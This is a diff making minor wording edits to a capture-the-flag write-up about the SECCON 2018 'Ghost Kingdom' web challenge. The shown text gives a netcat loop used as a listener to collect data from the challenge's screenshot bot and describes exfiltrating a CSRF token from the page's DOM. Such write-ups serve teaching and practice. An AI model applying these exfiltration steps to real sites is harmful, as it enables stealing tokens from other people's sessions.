cr0wnctf/cr0wnctf.github.io/_posts/2018-11-29-seccon_ghostkingdom.markdown

     r = req.get(message)
 ```

-Server side we used netcat in a while loop with a tiny webpage to speed up the above script since the bot won't hang waiting for a non-existent background image.
+Server side we used netcat in a while loop with a tiny webpage to speed up the above script so the bot won't hang waiting for a non-existent background image.

 ```bash
 while true; do { echo -e 'HTTP/1.1 200 OK\r\n'; echo -e "THINGS\n\r\n"; } | nc -lv 8001 -q 1; done
 ```

-If you felt like it this serves nicely as a very quick and dirty static HTML webserver for future reference.
+If you felt like it, netcat in a loop nicely serves as a very quick and dirty static HTML webserver.

 One catch being that we can only exfiltrate data present in the DOM of the page; there isn't a way to arbitrarily get pages or do anything _really_ interesting.
-There was only one thing we could exfiltrate, and that was the CSRF token which is _dull and boring and not fun_.
+There was only one thing we can exfiltrate, and that was the CSRF token which is _dull and boring and not fun_.
 At this point we started to get frustrated.
 It felt like we had a lot of the pieces!
 Things had been fitting nicely,
 but we just need one more.
 To recap what we know:

 1. We can force the local screenshot bot to login as a local user